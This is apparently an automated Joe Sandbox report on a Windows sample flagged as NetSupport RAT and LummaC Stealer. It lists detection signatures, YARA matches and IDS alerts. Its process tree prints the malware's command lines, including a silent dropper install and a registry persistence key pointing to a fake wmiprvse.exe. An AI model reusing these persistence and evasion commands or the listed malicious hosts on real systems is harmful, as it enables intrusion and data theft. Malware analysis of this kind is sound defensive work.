Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZmWSzgevgt.exe

Overview

General Information

Sample name:ZmWSzgevgt.exe
renamed because original name is a hash value
Original sample name:4f2d5d155fe7497f9ab429cae34c5ebbdd711b0256b3bae83d9038cf1526c724.exe
Analysis ID:1354609
MD5:2deaf2be4672bf6457e136d78a7a3940
SHA1:f8460d05dbdb1c171818510c9685847d00468349
SHA256:4f2d5d155fe7497f9ab429cae34c5ebbdd711b0256b3bae83d9038cf1526c724
Tags:exe
Infos:

Detection

NetSupport RAT, LummaC Stealer
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
Binary is likely a compiled AutoIt script file
Contains functionality to detect sleep reduction / modifications
Creates an undocumented autostart registry key
Obfuscated command line found
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Uses known network protocols on non-standard ports
Yara detected Generic Downloader
Adds / modifies Windows certificates
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML body contains low number of good links
HTML title does not match URL
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • ZmWSzgevgt.exe (PID: 6184 cmdline: C:\Users\user\Desktop\ZmWSzgevgt.exe MD5: 2DEAF2BE4672BF6457E136D78A7A3940)
    • ZmWSzgevgt.tmp (PID: 5240 cmdline: "C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp" /SL5="$20408,832512,832512,C:\Users\user\Desktop\ZmWSzgevgt.exe" MD5: BE0E74DC6AC70C5B8CC74C42B6999A70)
      • setup.exe (PID: 5800 cmdline: C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe MD5: 8657D8F7608F1E03726F5B0256869C66)
        • setup.tmp (PID: 1992 cmdline: "C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp" /SL5="$1047E,4289520,832512,C:\Users\user\AppData\Local\Temp\is-0270L.tmp\setup.exe" MD5: C039C014580F43E5B8162552F3CAF067)
          • a0.exe (PID: 2724 cmdline: "C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598 MD5: 5AFE9D5A2BCC39B1E0573A77EFBE82B7)
            • a0.tmp (PID: 3172 cmdline: "C:\Users\user\AppData\Local\Temp\is-8LRUI.tmp\a0.tmp" /SL5="$204E6,10235147,832512,C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2598 MD5: AD96645518D5ABDD4F96B007E799F61E)
              • cmd.exe (PID: 1472 cmdline: "cmd.exe" /c expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* %ProgramData% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • expand.exe (PID: 5696 cmdline: expand C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\{app}\aglwjhm.cab -F:* C:\ProgramData MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
              • cmd.exe (PID: 6036 cmdline: "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 4368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • reg.exe (PID: 5020 cmdline: reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
              • wmiprvse.exe (PID: 6024 cmdline: C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe MD5: 261D6E9D4571D1938CB54A2AE1B1821D)
              • cmd.exe (PID: 1964 cmdline: "cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x03^&pb=1^&px=2598 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • chrome.exe (PID: 5556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
                  • chrome.exe (PID: 2972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1944,i,7293326498590966015,15724221701917447522,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • a1.exe (PID: 7588 cmdline: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe" /qn CAMPAIGN="2598 MD5: FA24733F5A6A6F44D0E65D7D98B84AA6)
            • msiexec.exe (PID: 6192 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Johan.msi" /qn CAMPAIGN=2598 AI_SETUPEXEPATH=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe SETUPEXEDIR=C:\Users\user\AppData\Local\Temp\is-53US7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 /qn CAMPAIGN=""2598"" " CAMPAIGN="2598 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7932 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8052 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7B2098DE867FDA1FBAC9E94E8D311FE9 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6972 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CB3F137362C364F2A010C44D44B9B692 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • taskkill.exe (PID: 7756 cmdline: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7400 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A0F7B99CF6F59695615DF13CC6461763 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7824 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9A415338A0E06E3AA66F7530B5FE606F C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 8128 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 50B63A94597415634C568616DD551356 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • taskkill.exe (PID: 7560 cmdline: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4012 cmdline: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7360 cmdline: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Windows Updater.exe (PID: 5572 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe" /silentall -nofreqcheck -nogui MD5: F95007206C6B2407FB69748EF7C93612)
    • Windows Updater.exe (PID: 6304 cmdline: C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe" /install silentall "C:\Windows\TEMP\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.ini MD5: F95007206C6B2407FB69748EF7C93612)
      • v113.exe (PID: 7476 cmdline: "C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe" MD5: 8CAD036C5CFED94D5319A060C488E38F)
        • msiexec.exe (PID: 2928 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\System Updater.msi" AI_SETUPEXEPATH="C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe" SETUPEXEDIR="C:\ProgramData\AW Manager\Windows Manager\updates\v113\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1701869374 " MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • AdvancedWindowsManager.exe (PID: 5808 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
  • AdvancedWindowsManager.exe (PID: 7908 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 4052 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 4372 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 4796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 7592 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 3936 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 4832 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 5000 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 4012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 6308 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
    • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AdvancedWindowsManager.exe (PID: 3012 cmdline: "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080 MD5: 26F21ED76944ED83382851D9F2453B0E)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\078630d72d217d4d9885ece5b71fe988.tmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\e6adbd27df47824481105a18183e1d5e.tmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\f88670462385d642bd8a486306392759.tmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-J9JTN.tmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
            C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\2041dcc7124af9419b0b672e9d7171f7.tmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              Click to see the 3 entries
              SourceRuleDescriptionAuthorStrings
              0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                0000000E.00000002.4543369015.0000000000402000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000E.00000002.4545412473.0000000000D90000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      0000000E.00000002.4554414336.00000000111E2000.00000004.00000001.01000000.00000012.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        Click to see the 6 entries
                        SourceRuleDescriptionAuthorStrings
                        14.2.wmiprvse.exe.6bea0000.3.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          14.0.wmiprvse.exe.400000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            14.2.wmiprvse.exe.111b8c68.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                              14.2.wmiprvse.exe.111b8c68.2.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                14.2.wmiprvse.exe.6bf00000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                  Click to see the 5 entries
                                  No Sigma rule has matched
                                  Timestamp:192.168.2.577.105.136.350296812046045 12/06/23-14:36:21.023223
                                  SID:2046045
                                  Source Port:50296
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350339812046045 12/06/23-14:36:51.222959
                                  SID:2046045
                                  Source Port:50339
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.5104.21.83.14550240802048094 12/06/23-14:35:36.356295
                                  SID:2048094
                                  Source Port:50240
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350333812046045 12/06/23-14:36:47.245112
                                  SID:2046045
                                  Source Port:50333
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350342812046045 12/06/23-14:36:53.204282
                                  SID:2046045
                                  Source Port:50342
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.5104.21.83.14550196802855505 12/06/23-14:35:05.037520
                                  SID:2855505
                                  Source Port:50196
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350281812046045 12/06/23-14:36:10.745594
                                  SID:2046045
                                  Source Port:50281
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350290812046045 12/06/23-14:36:17.057630
                                  SID:2046045
                                  Source Port:50290
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350278812046045 12/06/23-14:36:08.769868
                                  SID:2046045
                                  Source Port:50278
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350253812046045 12/06/23-14:35:52.149838
                                  SID:2046045
                                  Source Port:50253
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350351812046045 12/06/23-14:36:59.140117
                                  SID:2046045
                                  Source Port:50351
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350367812046045 12/06/23-14:37:10.788474
                                  SID:2046045
                                  Source Port:50367
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350287812046045 12/06/23-14:36:15.015230
                                  SID:2046045
                                  Source Port:50287
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350324812046045 12/06/23-14:36:39.669230
                                  SID:2046045
                                  Source Port:50324
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350315812046045 12/06/23-14:36:33.722404
                                  SID:2046045
                                  Source Port:50315
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350306812046045 12/06/23-14:36:27.603943
                                  SID:2046045
                                  Source Port:50306
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350280812046045 12/06/23-14:36:10.078872
                                  SID:2046045
                                  Source Port:50280
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350269812046045 12/06/23-14:36:02.831888
                                  SID:2046045
                                  Source Port:50269
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350323812046045 12/06/23-14:36:38.995481
                                  SID:2046045
                                  Source Port:50323
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350262812046045 12/06/23-14:35:58.204295
                                  SID:2046045
                                  Source Port:50262
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350297812046045 12/06/23-14:36:21.680969
                                  SID:2046045
                                  Source Port:50297
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350300812046045 12/06/23-14:36:23.660225
                                  SID:2046045
                                  Source Port:50300
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350358812046045 12/06/23-14:37:04.890944
                                  SID:2046045
                                  Source Port:50358
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350357812046045 12/06/23-14:37:03.144834
                                  SID:2046045
                                  Source Port:50357
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.5157.230.96.3250126802834928 12/06/23-14:33:41.532380
                                  SID:2834928
                                  Source Port:50126
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350316812046045 12/06/23-14:36:34.370818
                                  SID:2046045
                                  Source Port:50316
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350370812046045 12/06/23-14:37:12.776192
                                  SID:2046045
                                  Source Port:50370
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350305812046045 12/06/23-14:36:26.947206
                                  SID:2046045
                                  Source Port:50305
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350263812046045 12/06/23-14:35:58.892261
                                  SID:2046045
                                  Source Port:50263
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350334812046045 12/06/23-14:36:47.909549
                                  SID:2046045
                                  Source Port:50334
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350268812046045 12/06/23-14:36:02.185549
                                  SID:2046045
                                  Source Port:50268
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350352812046045 12/06/23-14:36:59.810575
                                  SID:2046045
                                  Source Port:50352
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350245812046045 12/06/23-14:35:46.787174
                                  SID:2046045
                                  Source Port:50245
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350286812046045 12/06/23-14:36:14.346391
                                  SID:2046045
                                  Source Port:50286
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350264812046045 12/06/23-14:35:59.558216
                                  SID:2046045
                                  Source Port:50264
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350368812046045 12/06/23-14:37:11.445584
                                  SID:2046045
                                  Source Port:50368
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350270812046045 12/06/23-14:36:03.477604
                                  SID:2046045
                                  Source Port:50270
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350261812046045 12/06/23-14:35:57.535196
                                  SID:2046045
                                  Source Port:50261
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350301812046045 12/06/23-14:36:24.319593
                                  SID:2046045
                                  Source Port:50301
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350279812046045 12/06/23-14:36:09.427188
                                  SID:2046045
                                  Source Port:50279
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350350812046045 12/06/23-14:36:58.477999
                                  SID:2046045
                                  Source Port:50350
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.5159.223.29.4049730802839343 12/06/23-14:33:21.497166
                                  SID:2839343
                                  Source Port:49730
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:Potentially Bad Traffic
                                  Timestamp:192.168.2.577.105.136.350288812046045 12/06/23-14:36:15.727049
                                  SID:2046045
                                  Source Port:50288
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350338812046045 12/06/23-14:36:50.569356
                                  SID:2046045
                                  Source Port:50338
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350344812046045 12/06/23-14:36:54.501584
                                  SID:2046045
                                  Source Port:50344
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350285812046045 12/06/23-14:36:13.685357
                                  SID:2046045
                                  Source Port:50285
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350291812046045 12/06/23-14:36:17.724996
                                  SID:2046045
                                  Source Port:50291
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350255812046045 12/06/23-14:35:53.486217
                                  SID:2046045
                                  Source Port:50255
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350258812046045 12/06/23-14:35:55.450063
                                  SID:2046045
                                  Source Port:50258
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350353812046045 12/06/23-14:37:00.456748
                                  SID:2046045
                                  Source Port:50353
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350347812046045 12/06/23-14:36:56.459765
                                  SID:2046045
                                  Source Port:50347
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350249812046045 12/06/23-14:35:49.517021
                                  SID:2046045
                                  Source Port:50249
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.595.142.47.114971812032827745 12/06/23-14:33:18.908166
                                  SID:2827745
                                  Source Port:49718
                                  Destination Port:1203
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350314812046045 12/06/23-14:36:33.067223
                                  SID:2046045
                                  Source Port:50314
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350349812046045 12/06/23-14:36:57.813215
                                  SID:2046045
                                  Source Port:50349
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.5104.21.83.14550196802048094 12/06/23-14:35:05.671865
                                  SID:2048094
                                  Source Port:50196
                                  Destination Port:80
                                  Protocol:TCP
